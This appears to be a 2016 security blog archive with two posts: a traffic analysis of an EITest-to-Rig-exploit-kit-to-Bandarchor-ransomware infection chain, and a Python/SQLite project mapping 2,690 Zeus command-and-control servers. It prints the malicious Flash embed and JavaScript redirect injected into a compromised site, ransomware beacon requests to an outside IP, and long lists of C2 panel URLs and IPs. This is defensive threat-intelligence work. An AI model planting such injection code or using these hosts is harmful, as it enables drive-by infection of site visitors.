Month: September 2016

ElTest -> Rig Exploit Kit -> Bandarchor Ransomware Traffic Analysis

Source: malware-traffic-analysis.net

​The infection method is as follows:

  • www[.]tdca[.]ca – Compromised site
  • mapobifi[.]xyz – 85.93.0.110 port 80 – EITest gate
  •  ew[.]203kcontractorsarkansas[.]com – 109.234.36.220 port 80 –  Rig EK
  • 109.236.87.204 – GET /default.jpg – Post-infection traffic caused by the Bandarchor ransomware
  • 109.236.87.204 – POST /yyy/fers.php – Post-infection traffic caused by the Bandarchor ransomware

*Analyze PCAP using filter “http.request”

Relevant Additional Analysis:

  1. Get / HTTP/1.1 request to 207.182.128.162 (length: 523 bytes)
  2. Get HTTP request to 85.93.0.110 x2 (length: 414 & 426 bytes, respectively)
  3. Get HTTP request to 109.234.36.220 x4 (length: 523, 748, 698, & 504 bytes)​ 
  4. GET HTTP request to 109.236.36.204 x3 (length: 207, 229, & 229 bytes)


  1. Following TCP stream of the get request to 207.182.128.162 (length: 523 bytes) reveals Flash movie value and the embedded source with “allowScriptAccess” as hxxp://mapobifi.xyz/qdxtqktb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile from the website hxxp://www.tdca[.]ca.

The full injected source code to the compromised website is as follows:
 

 

<param name="allowScriptAccess" value="always“/><param name="movie” value=”hxxp://mapobifi[.]xyz/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/”/>

  

  1. GET mapobifi[.]xyz/qdxtqktkb3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile for the shockwave file with the header “CWS.” (referrer: hxxp://tdca.ca)

GET 
/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hxxp://www[.]tdca[.]ca/
x-flash-version: 19,0,0,185
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: mapobifi.xyz
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:49 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 5508
Connection: close
Content-Type: application/x-shockwave-flash
 
 
GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/xqt.gif HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxp://www[.]tdca[.]ca/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: mapobifi.xyz
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:50 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 821
Connection: close
Content-Type: text/html; charset=UTF-8
 
 
3. Using JavaScript, redirects the user to 
‘hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE’ using JavaScript (size? Type?) 
The full source code is as follows:
 







FkvuNhVRWkQvU gHotiiKKThQZIzrkE fTWAIIlM d hRBB

document.location.href = “hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE”;

geLpj gSiBzQqkfSZxSYdDAiUSDyI JwGPSXD xnJ


 
4. GET 
hxxp://ew[.]203kcontractorsarkansas[.]com/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU
5. Same request but to GET index[.]php?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU

6. GET to /default.jpg and POST to /yyy/fers[.]php 109.236.87.204 

The full script as follows:
GET /default[.]jpg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 109.236.87.204
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Date: Sat, 27 Aug 2016 01:10:20 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Thu, 19 May 2016 09:26:49 GMT
ETag: “7-5332e92dca840”
Accept-Ranges: bytes
Content-Length: 7
Content-Type: image/jpeg
 
defaultPOST /yyy/fers[.]php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: post_example
Host: 109.236.87.204
Content-Length: 1395
Cache-Control: no-cache

ZeusC2Tracker: Location Analyzer Using GeoCode API

Goal: ​Obtain geographical location coordinates of current and historical Zeus servers and visualize them on the Google Map.

Data Source:
(1) zeustracker.abuse.ch
(2) cybercrime-tracker.net

Language: Python, Regular Expressions, SQLite, JavaScript, HTML
APIGoogle Maps Geocoding API, IP-API JSON API, plotly

                         We see the largest number of ZeusC2 in the first quarter of 2015.


*Creates a SQL table with 2,690 Zeus Command-and-Control servers and visualizes the database via Google Maps Geocoding API.
Method of Operation:
*Creates SQL database “ZeusC2Tracker.sqlite” with columns mdate, url, ip, rtype, rsource;
*Converts Zeus hostnames to cities using ip-api.com JSON API;
*Obtains lat/long values using GeoCode API, and stores values in another SQL database “geodata.sqlite”;
*Maps the data from “geodata.sqlite” to Javascript file “where.js”;
*Creates viewable Google-mapped values in “where.html” that point to “where.js”.

Usage:
1) Run Zeusloader.py to create monolithic “ZeusC2Tracker.sqlite” database with columns mdate, url, ip, rtype, rsource;

(2) Run ZeusHostConverter.py to convert hostnames to cities using /ip-api.com JSON API and post data to new”where.data” file;
(3) Run Geoload.py to parse “where.data”, obtain lat/long values using GeoCode API, and store values in SQL  database “geodata.sqlite”;
(4) Run Geodump.py to map the data from “geodata.sqlite” to new Javascript file “where.js”; and
(5) View the Google-mapped values in “where.html” that point to “where.js”.

Example of SQL query “SELECT * From ZeusC2Tracker;”

Here are some interesting findings based on this SQL ZeusC2Tracker database of  2,690 ZeusC2’s:


(1) We have 90 .ru [Russian] domains associated with ZeusC2’s.
(2) We have 6 domains that contain string “bank” associated with ZeusC2’s.
(3) We have 1,442 default Zeus installs associated with ZeusC2. They are identified by default control panel path “/cp.php?m=login“.
(4) We have 16 TOR [onion] domains associated with ZeusC2’s.
(5) We have 1,092 .com domains associated with ZeusC2’s.
(6) We have 35 .ua [Ukrainian] domains associated with ZeusC2’s.
(7) We have 5 .cc [Cocos (Keeling) Islands – often used by carding community] domains associated with ZeusC2’s.
(8) We have 28 .su [Soviet Union] domains associated with ZeusC2’s.
(9) We have 2 .gov [1 – Colombian, 1- Turkish] domains associated with ZeusC2’s.
(10) We have 3 most popular IPs 199.192.231.250 [26 domains], 198.1.80.203 [21 domains], 162.144.127.104 [16 domains] associated with with ZeusC2’s.

In [2]:
import sqlite3
import pandas as pd
import plotly.plotly as py # interactive graphing
from plotly.graph_objs import Bar, Scatter, Marker, Layout
In [3]:
conn = sqlite3.connect('ZeusC2Tracker.sqlite')
In [3]:
df = pd.read_sql_query('SELECT * FROM ZeusC2Tracker', conn)
In [12]:
print df
        id       mdate                                                url  \
0        1  14-01-2016            www.proacti.com.br/bosco/cp.php?m=login   
1        2  14-01-2016  www.manju.co.in/wp/wp-includes/js/crop/cropper...   
2        3  10-01-2016            diagnosticdubai.com/UCHE/cp.php?m=login   
3        4  08-01-2016            bannersbrasil.com.br/mum/cp.php?m=login   
4        5  08-01-2016          siliverstersnewone.in/html/cp.php?m=login   
5        6  06-01-2016                     ozowarac.com/jj/cp.php?m=login   
6        7  06-01-2016                     ozowarac.com/ff/cp.php?m=login   
7        8  06-01-2016                     ozowarac.com/me/cp.php?m=login   
8        9  06-01-2016  www.bawtrycarbons.com/pin/somzy/admin.php?lett...   
9       10  04-01-2016               www.cennoworld.com/ur/cp.php?m=login   
10      11  03-01-2016  www.dphcustompins.com/staging/skin/frontend/de...   
11      12  03-01-2016                   yalitest3.info/be4/a.php?m=login   
12      13  22-12-2015  allterrainadventures.co.uk/media/css/panel/cp....   
13      14  22-12-2015  vrglongthanh.com.vn/kuzole/30/cp.php?letter=login   
14      15  16-12-2015  want-to-buy.co.uk/wp-includes/pomo/.mysql/ssl/...   
15      16  11-12-2015  studio020.com/anims/admin/admin/spirit.php?let...   
16      17  11-12-2015  ebenezerfm.com/wp-content/uploads/2012/cp.php?...   
17      18  11-12-2015  mat-update.be/bulletprove-gameover/cp.php?m=login   
18      19  10-12-2015        mediacomholdings.com/sql/rim/cp.php?m=login   
19      20  07-12-2015      prodsamps.pw/mavlad/panel/cp.php?letter=login   
20      21  07-12-2015       prodsamps.pw/shile/panel/cp.php?letter=login   
21      22  04-12-2015  beemasewakendra.com/slide/js/.cache/ssl/.cphor...   
22      23  04-12-2015  studentscompanion.in/reservation/img/products/...   
23      24  04-12-2015              2becomputers.com/conta/cp.php?m=login   
24      25  04-12-2015            saner.com.au/blog/server/cp.php?m=login   
25      26  04-12-2015  cheshamfrench.co.uk/martins/server/cp.php?m=login   
26      27  29-11-2015        91.236.213.74/pictures/standard.php?m=login   
27      28  28-11-2015              192.99.99.251:6500/a/data.php?m=login   
28      29  28-11-2015    satyamsng.com/xres/css/.mode/home/u.php?m=login   
29      30  28-11-2015              omnienergy.com.au/file/cp.php?m=login   
...    ...         ...                                                ...   
2660  2661  2013-07-25                                       103.7.59.135   
2661  2662  2013-07-20                            reserve.jumpingcrab.com   
2662  2663  2013-07-19                                     www.witkey.com   
2663  2664  2013-07-18                                  lonsmemorials.com   
2664  2665  2013-07-13                       google.poultrymiddleeast.com   
2665  2666  2013-07-08                                       ice.ip64.net   
2666  2667  2013-06-24                         igor32.herbalbrasil.com.br   
2667  2668  2013-06-16                             gate.timstackleshop.es   
2668  2669  2013-06-15                         projects.globaltronics.net   
2669  2670  2013-06-13                                     jgworldupd.com   
2670  2671  2013-06-10                                    porschecosv.com   
2671  2672  2013-06-08                                        64.85.233.8   
2672  2673  2013-05-28                              bbwscimanuk.pdsda.net   
2673  2674  2013-05-26                                    dattinggate.com   
2674  2675  2013-05-22                                      199.7.234.100   
2675  2676  2013-05-16                                      109.229.36.65   
2676  2677  2013-05-10                                      190.15.192.25   
2677  2678  2013-04-25                           www.group-billarclub.com   
2678  2679  2013-04-09                                   illinoisnets.net   
2679  2680  2013-03-28                                    128.210.157.251   
2680  2681  2013-03-21                                    visit2013.in.ua   
2681  2682  2013-01-23                                        jangasm.org   
2682  2683  2013-01-07                                      serversss.biz   
2683  2684  2012-12-10                        counter-1.adscounter.com.ua   
2684  2685  2012-12-03                                      83.15.254.242   
2685  2686  2012-11-01                                 diosdelared.com.mx   
2686  2687  2012-10-12                                         hruner.com   
2687  2688  2012-10-12                                           dasch.pl   
2688  2689  2012-10-09                                  allfortune777.biz   
2689  2690  2012-08-25                                       64.127.71.73   

                   ip      rtype                rsource  
0     186.202.127.118       Zeus  CyberCrimeTracker.net  
1         198.1.74.28       Zeus  CyberCrimeTracker.net  
2     216.158.236.124       Zeus  CyberCrimeTracker.net  
3     186.202.127.118       Zeus  CyberCrimeTracker.net  
4       162.214.5.117       Zeus  CyberCrimeTracker.net  
5       198.105.221.5       Zeus  CyberCrimeTracker.net  
6       198.105.221.5       Zeus  CyberCrimeTracker.net  
7       198.105.221.5       Zeus  CyberCrimeTracker.net  
8      108.167.131.34       Zeus  CyberCrimeTracker.net  
9       198.105.221.5       Zeus  CyberCrimeTracker.net  
10      23.229.238.21       Zeus  CyberCrimeTracker.net  
11     74.117.183.206       Zeus  CyberCrimeTracker.net  
12    185.116.212.119       Zeus  CyberCrimeTracker.net  
13     112.213.89.101       Zeus  CyberCrimeTracker.net  
14      185.24.98.175       Zeus  CyberCrimeTracker.net  
15        83.98.177.7       Zeus  CyberCrimeTracker.net  
16        69.4.233.96       Zeus  CyberCrimeTracker.net  
17      198.105.221.5       Zeus  CyberCrimeTracker.net  
18     129.232.131.10       Zeus  CyberCrimeTracker.net  
19      158.255.6.112       Zeus  CyberCrimeTracker.net  
20      158.255.6.112       Zeus  CyberCrimeTracker.net  
21      184.95.41.121       Zeus  CyberCrimeTracker.net  
22      184.95.41.121       Zeus  CyberCrimeTracker.net  
23      198.50.98.253       Zeus  CyberCrimeTracker.net  
24       27.121.64.74       Zeus  CyberCrimeTracker.net  
25       69.28.199.60       Zeus  CyberCrimeTracker.net  
26                          Zeus  CyberCrimeTracker.net  
27                          Zeus  CyberCrimeTracker.net  
28      184.95.41.121       Zeus  CyberCrimeTracker.net  
29      27.121.64.198       Zeus  CyberCrimeTracker.net  
...               ...        ...                    ...  
2660    199.7.234.100       ZeuS         ZeusTracker.ch  
2661    109.229.36.65    Citadel         ZeusTracker.ch  
2662    190.15.192.25    Citadel         ZeusTracker.ch  
2663                     Citadel         ZeusTracker.ch  
2664                     Citadel         ZeusTracker.ch  
2665  128.210.157.251  Ice', 'IX         ZeusTracker.ch  
2666                        ZeuS         ZeusTracker.ch  
2667                     Citadel         ZeusTracker.ch  
2668                   Ice', 'IX         ZeusTracker.ch  
2669                     Citadel         ZeusTracker.ch  
2670    83.15.254.242       ZeuS         ZeusTracker.ch  
2671                     Citadel         ZeusTracker.ch  
2672   107.163.174.74    Citadel         ZeusTracker.ch  
2673                     Citadel         ZeusTracker.ch  
2674                        ZeuS         ZeusTracker.ch  
2675     64.127.71.73       ZeuS         ZeusTracker.ch  
2676    87.254.167.37       ZeuS         ZeusTracker.ch  
2677     94.103.36.55                    ZeusTracker.ch  
2678      60.13.186.5       ZeuS         ZeusTracker.ch  
2679   203.170.193.23       ZeuS         ZeusTracker.ch  
2680   188.247.135.99       ZeuS         ZeusTracker.ch  
2681   188.247.135.53       ZeuS         ZeusTracker.ch  
2682   188.247.135.74       ZeuS         ZeusTracker.ch  
2683  216.176.100.240  Ice', 'IX         ZeusTracker.ch  
2684   151.97.190.239       ZeuS         ZeusTracker.ch  
2685   188.247.135.58       ZeuS         ZeusTracker.ch  
2686  188.219.154.228    Citadel         ZeusTracker.ch  
2687  216.215.112.149  Ice', 'IX         ZeusTracker.ch  
2688  210.211.108.215       ZeuS         ZeusTracker.ch  
2689    109.127.8.242       ZeuS         ZeusTracker.ch  

[2690 rows x 6 columns]
In [15]:
df = pd.read_sql_query("SELECT mdate, COUNT(*) as 'num_of_ZeusC2' FROM ZeusC2Tracker GROUP BY mdate ORDER BY 'num_of_ZeusC2'", conn)
py.iplot([Bar(x=df.mdate, y=df.num_of_ZeusC2)], filename='Number of ZeusC2 by mdate')
Out[15]:
https://plot.ly/~vkremez/15.embed
In [20]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_RuZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%.ru%' GROUP BY url ORDER BY 'num_of_RuZeusC2'", conn)
In [21]:
print df
                                                  url  num_of_RuZeusC2
0      actualmove.ru/images/terrymax/1/cp.php?m=login                1
1       aflar.ru/images/home/ppns/cp.php?letter=login                1
2    aflar.ru/images/major/kraftz/cp.php?letter=login                1
3   alaska2russia.ru/kraftz/major/cp.php?letter=login                1
4   almazdental.ru/wp-includes/pomo/panel/cp.php?m...                1
5                                           atmape.ru                1
6               baims.ru/lk/feeds/site/cp.php?m=login                1
7                      bbumn.ru/fire/cart.php?m=login                1
8                        bbumn.ru/nico/cp.php?m=login                1
9              bitcoin-send.ru/geobase/cp.php?m=login                1
10                                   blesslifelove.ru                1
11                                         bqtest2.ru                1
12               brr-21.ru.shn-host.ru/cp.php?m=login                1
13                                   cd31411.tmweb.ru                1
14                cogoda.ru/biZHubb/admin.php?m=login                1
15                       danbeta.ru/g1/cp.php?m=login                1
16                       danbeta.ru/g2/cp.php?m=login                1
17                       danbeta.ru/g3/cp.php?m=login                1
18                       danbeta.ru/g4/cp.php?m=login                1
19                       danbeta.ru/g5/cp.php?m=login                1
20                               dileconme.hotmail.ru                1
21           dozybrown.ru/osi1/30/cp.php?letter=login                1
22                         eddw.ru/144/cp.php?m=login                1
23                    endnra.ru/logs/cart.php?m=login                1
24                  fitytrade.ru/diff1/cp.php?m=login                1
25                                         fx45.pp.ru                1
26                                        genmjob3.ru                1
27                                        geopryce.ru                1
28                   goa-inf.ru/php/admin.php?m=login                1
29                              gyodundena.hotmail.ru                1
..                                                ...              ...
60                      sp4m.ru/09/nd3/cp.php?m=login                1
61                      sp4m.ru/09/seb/cp.php?m=login                1
62                           sp4m.ru/1/cp.php?m=login                1
63                          sp4m.ru/11/cp.php?m=login                1
64                         sp4m.ru/111/cp.php?m=login                1
65                        sp4m.ru/1111/cp.php?m=login                1
66                           sp4m.ru/5/cp.php?m=login                1
67                          sp4m.ru/55/cp.php?m=login                1
68                         sp4m.ru/555/cp.php?m=login                1
69                        sp4m.ru/5555/cp.php?m=login                1
70                         sp4m.ru/css/cp.php?m=login                1
71                         sp4m.ru/fem/cp.php?m=login                1
72                          sp4m.ru/js/cp.php?m=login                1
73                    tosyisha.ru/ub02/cp.php?m=login                1
74                        u0003321.cp.regruhosting.ru                1
75         ulogroup.ru/wp-server/admin/cp.php?m=login                1
76          uralviolet.ru/img/bin/ben/server/install/                1
77   viose.ru/images/major/kraftz/cp.php?letter=login                1
78        vz81757.eurodir.ru/gennadaok/cp.php?m=login                1
79            warfacebest.ru.swtest.ru/cp.php?m=login                1
80                             www.changeexchange2.ru                1
81      www.eroconlia.ru/files/30/cp.php?letter=login                1
82                            www.luxkupe.ru/install/                1
83        www.ruyacafe.net/wppress/fac/cp.php?m=login                1
84       www.ruyacafe.net/wppress/udok/cp.php?m=login                1
85  www.tvergeneration.ru/photo/indexx.php?letter=...                1
86            www.zvenigorodskoe.ru/js/cp.php?m=login                1
87                            ya-aaaa123123.myjino.ru                1
88                                      zabava-bel.ru                1
89                                       zhyravlik.ru                1

[90 rows x 2 columns]
In [23]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_Bank_ZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%bank%' GROUP BY url ORDER BY 'num_of_Bank_ZeusC2'", conn)
print df
                                                 url  num_of_Bank_ZeusC2
0  centraltransbankonlinetrans.org/panel2/cp.php?...                   1
1                                         evobank.co                   1
2              goalgetterssa.in/banks/cp.php?m=login                   1
3     syndlcatebank.co.in/6/serverphp/cp.php?m=login                   1
4                 ua-banki.com/images/cp.php?m=login                   1
5  www.cbankng.info/11/admin/1/metro11/admin/1/cp...                   1
6  zxjfcvfvhqfqsrpz.onion/~mekzi/log-bank_com/2/c...                   1
In [32]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_default_ZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%cp.php?m=login%' GROUP BY url ORDER BY 'num_of_default_ZeusC2'", conn)
In [33]:
print df
                                                    url  num_of_default_ZeusC2
0     03a6b7a.netsolhost.com/order/server/cp.php?m=l...                      1
1           03a6f57.netsolhost.com/shoes/cp.php?m=login                      1
2             03bbec4.netsolhost.com/udo/cp.php?m=login                      1
3                 103.26.128.84/botnet/1/cp.php?m=login                      1
4     104.166.67.26/~ctrrosan/wp/wp-admin/jss/cp.php...                      1
5           104.192.103.94/forever/helps/cp.php?m=login                      1
6             104.237.194.158/appy/panel/cp.php?m=login                      1
7                    107.182.135.23/brew/cp.php?m=login                      1
8            107.182.142.41/serverphp/r7/cp.php?m=login                      1
9      108.175.156.136/~stats/images/css/cp.php?m=login                      1
10                     109.169.92.40/.sh/cp.php?m=login                      1
11          109.200.196.187/~mar23/admmm/cp.php?m=login                      1
12             109.200.196.187/~mar23/wc/cp.php?m=login                      1
13      116.0.23.234/~opt25643/swf/.base/cp.php?m=login                      1
14          116.193.77.118/~bee20734/vex/cp.php?m=login                      1
15      142.0.36.226/office/badoo/server/cp.php?m=login                      1
16     142.0.36.226/office/blarry/server/cp.php?m=login                      1
17      142.0.36.226/office/david/server/cp.php?m=login                      1
18      142.0.36.226/office/ebony/server/cp.php?m=login                      1
19     142.0.36.226/office/isiaka/server/cp.php?m=login                      1
20      142.0.36.226/office/nassy/server/cp.php?m=login                      1
21    142.0.78.144/xampp/greenslide/mafia/cp.php?m=l...                      1
22    142.0.78.145/xampp/bluemagic/magicsystem/cp.ph...                      1
23                           146.0.36.43/cp.php?m=login                      1
24                   149.154.64.20/files/cp.php?m=login                      1
25           162.144.3.101/~aussawin/zzz/cp.php?m=login                      1
26             167.88.15.203/henrybellon/cp.php?m=login                      1
27                     167.88.15.203/old/cp.php?m=login                      1
28             173.0.51.45/~allhailh/ahm/cp.php?m=login                      1
29    173.243.112.220/xampp/beright/moneypanel/cp.ph...                      1
...                                                 ...                    ...
1412                 yamleg.fu8.com/acho/cp.php?m=login                      1
1413                  yamleg.fu8.com/dan/cp.php?m=login                      1
1414                   yamleg.fu8.com/em/cp.php?m=login                      1
1415                   yamleg.fu8.com/ik/cp.php?m=login                      1
1416                   yamleg.fu8.com/xx/cp.php?m=login                      1
1417  yapanyapi.com/katolog/thumbs/panel/cp.php?m=login                      1
1418  yilinmilletvekili.com/Blast/serverphp/cp.php?m...                      1
1419    yogicmanagement.com/wp-admin/jss/cp.php?m=login                      1
1420       youronlinecasinobonuses.com/k/cp.php?m=login                      1
1421                   yumcsupply.com/st/cp.php?m=login                      1
1422            yysopqde.com/panel/Panel/cp.php?m=login                      1
1423     z3us1.z-ed.info/z3us_kwksdlfklw/cp.php?m=login                      1
1424        zapata1.co.uk/jojo/serverphp/cp.php?m=login                      1
1425                 zdemo.mooo.com/zeus/cp.php?m=login                      1
1426               zohaibbeauty.com/load/cp.php?m=login                      1
1427                       zokah.dk/e777/cp.php?m=login                      1
1428                        zukkoshop.su/cp.php?m=login                      1
1429  zxjfcvfvhqfqsrpz.onion/~ifybo/zeu5/r/cp.php?m=...                      1
1430  zxjfcvfvhqfqsrpz.onion/~lemore/log-needed-asap...                      1
1431  zxjfcvfvhqfqsrpz.onion/~mekzi/ali-pay_com/1/cp...                      1
1432  zxjfcvfvhqfqsrpz.onion/~mekzi/log-bank_com/2/c...                      1
1433  zxjfcvfvhqfqsrpz.onion/~mekzi/manuchimso_com/3...                      1
1434  zxjfcvfvhqfqsrpz.onion/~mekzi/mekzi-logs_com/4...                      1
1435  zxjfcvfvhqfqsrpz.onion/~mekzi/oluwa-involved_c...                      1
1436  zxjfcvfvhqfqsrpz.onion/~nelson/crome/1/cp.php?...                      1
1437  zxjfcvfvhqfqsrpz.onion/~nelson/ebere/1/1/cp.ph...                      1
1438  zxjfcvfvhqfqsrpz.onion/~nelson/ebere/1/cp.php?...                      1
1439  zxjfcvfvhqfqsrpz.onion/~nelson/new1/1/cp.php?m...                      1
1440  zxjfcvfvhqfqsrpz.onion/~new/lmao/123/cp.php?m=...                      1
1441  zxjfcvfvhqfqsrpz.onion/~new/paper-chasing-4lyf...                      1

[1442 rows x 2 columns]
In [34]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_TOR_ZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%onion%' GROUP BY url ORDER BY 'num_of_TOR_ZeusC2'", conn)
print df
                                                  url  num_of_TOR_ZeusC2
0   3qwajq5p5pfsi3sw.onion/~ogbeni1/one/admin.php?...                  1
1               ismjiope3jmwagf3.onion/cp.php?m=login                  1
2        kdsk3afdiolpgejs.onion/sphinx/cp.php?m=login                  1
3   zxjfcvfvhqfqsrpz.onion/~ifybo/zeu5/r/cp.php?m=...                  1
4   zxjfcvfvhqfqsrpz.onion/~lemore/log-needed-asap...                  1
5   zxjfcvfvhqfqsrpz.onion/~mekzi/ali-pay_com/1/cp...                  1
6   zxjfcvfvhqfqsrpz.onion/~mekzi/log-bank_com/2/c...                  1
7   zxjfcvfvhqfqsrpz.onion/~mekzi/manuchimso_com/3...                  1
8   zxjfcvfvhqfqsrpz.onion/~mekzi/mekzi-logs_com/4...                  1
9   zxjfcvfvhqfqsrpz.onion/~mekzi/oluwa-involved_c...                  1
10  zxjfcvfvhqfqsrpz.onion/~mine/cloudns_org/1/min...                  1
11  zxjfcvfvhqfqsrpz.onion/~nelson/crome/1/cp.php?...                  1
12  zxjfcvfvhqfqsrpz.onion/~nelson/ebere/1/1/cp.ph...                  1
13  zxjfcvfvhqfqsrpz.onion/~nelson/ebere/1/cp.php?...                  1
14  zxjfcvfvhqfqsrpz.onion/~nelson/new1/1/cp.php?m...                  1
15  zxjfcvfvhqfqsrpz.onion/~new/lmao/123/cp.php?m=...                  1
16  zxjfcvfvhqfqsrpz.onion/~new/paper-chasing-4lyf...                  1
In [38]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_COM_ZeusC2_domains' FROM ZeusC2Tracker WHERE url LIKE '%.com%' GROUP BY url ORDER BY 'num_of_COM_ZeusC2_domains'", conn)
print df
                                                    url  \
0                                039b1ee.netsolhost.com   
1                                03a6b7a.netsolhost.com   
2     03a6b7a.netsolhost.com/order/server/cp.php?m=l...   
3                                03a6f57.netsolhost.com   
4           03a6f57.netsolhost.com/shoes/cp.php?m=login   
5                                03bbec4.netsolhost.com   
6             03bbec4.netsolhost.com/udo/cp.php?m=login   
7     23445778889.com/best/new/mii/test/metro/admin/...   
8     23452246.com/off/new/sale/metro/admin/1/cp.php...   
9            24411244.com/sales/new/cp.php?letter=login   
10    24411244.com/thanks/metro/admin/1/cp.php?lette...   
11                                     2becomputers.com   
12                2becomputers.com/conta/cp.php?m=login   
13    345688776.com/inhere/new/test/metro/admin/1/cp...   
14       3addictions.com.au/Attach/kings/cp.php?m=login   
15                 3d-gold.com.hk/img/admin.php?m=login   
16    4455667778.com/new/seen/metro/admin/1/cp.php?l...   
17    454545663.com/kc/new/metro/admin/1/cp.php?lett...   
18    454545663.com/mic/test/metro/admin/1/cp.php?le...   
19    55566785677.com/new/test/metro/admin/1/cp.php?...   
20    6667788899ii.com/test/here/fr/metro/admin/1/cp...   
21                                        6pjddrtt7.com   
22                  6pjddrtt7.com/chrome/cp.php?m=login   
23    92.240.69.54/~busletak/alibaba.com/sexydon/ser...   
24     a2wpress.com/wp-admin/js/commonjs/cp.php?m=login   
25         abcdigitizing.com/images/good/cp.php?m=login   
26                aboniaamckdr.com/emman/cp.php?m=login   
27                aboniaamckdr.com/gabby/cp.php?m=login   
28                 aboniaamckdr.com/html/cp.php?m=login   
29               aboniaamckdr.com/public/cp.php?m=login   
...                                                 ...   
1062                      x65cr13.com/bb/cp.php?m=login   
1063                     xinsaer.com/w58/cp.php?m=login   
1064                  xpertitsol.com/db1/cp.php?m=login   
1065                    y7online.com/ftp/cp.php?m=login   
1066                                   yahoo-action.com   
1067                   yakinfetih.com/js/cp.php?m=login   
1068    yamalandgeorge.com/vtr/serverphp/cp.php?m=login   
1069                                     yamleg.fu8.com   
1070                 yamleg.fu8.com/acho/cp.php?m=login   
1071                  yamleg.fu8.com/dan/cp.php?m=login   
1072                   yamleg.fu8.com/em/cp.php?m=login   
1073                   yamleg.fu8.com/ik/cp.php?m=login   
1074                   yamleg.fu8.com/xx/cp.php?m=login   
1075  yapanyapi.com/katolog/thumbs/panel/cp.php?m=login   
1076  yasamaugrasi.com/wp-includes/images/media/cp.p...   
1077  yilinmilletvekili.com/Blast/serverphp/cp.php?m...   
1078  yilmazcelikservis.com.tr/images/admin.php?m=login   
1079    yogicmanagement.com/wp-admin/jss/cp.php?m=login   
1080  youngshoipstory.com/metro/admin/1/cp.php?lette...   
1081       youronlinecasinobonuses.com/k/cp.php?m=login   
1082                   yumcsupply.com/st/cp.php?m=login   
1083            yysopqde.com/panel/Panel/cp.php?m=login   
1084                                      z0bu.dynu.com   
1085                 zdemo.mooo.com/zeus/cp.php?m=login   
1086                              zeditsolutions.com.au   
1087                                zetes.vdsinside.com   
1088                          zeus.guvencelikimalat.com   
1089  zeusbotnet.net.onebigfishgreenevents.com/cody/...   
1090  zitoskillslimited.com/latest/Panel/cp.php?lett...   
1091               zohaibbeauty.com/load/cp.php?m=login   

      num_of_COM_ZeusC2_domains  
0                             1  
1                             1  
2                             1  
3                             1  
4                             1  
5                             1  
6                             1  
7                             1  
8                             1  
9                             1  
10                            1  
11                            1  
12                            1  
13                            1  
14                            1  
15                            1  
16                            1  
17                            1  
18                            1  
19                            1  
20                            1  
21                            1  
22                            1  
23                            1  
24                            1  
25                            1  
26                            1  
27                            1  
28                            1  
29                            1  
...                         ...  
1062                          1  
1063                          1  
1064                          1  
1065                          1  
1066                          1  
1067                          1  
1068                          1  
1069                          1  
1070                          1  
1071                          1  
1072                          1  
1073                          1  
1074                          1  
1075                          1  
1076                          1  
1077                          1  
1078                          1  
1079                          1  
1080                          1  
1081                          1  
1082                          1  
1083                          1  
1084                          1  
1085                          1  
1086                          1  
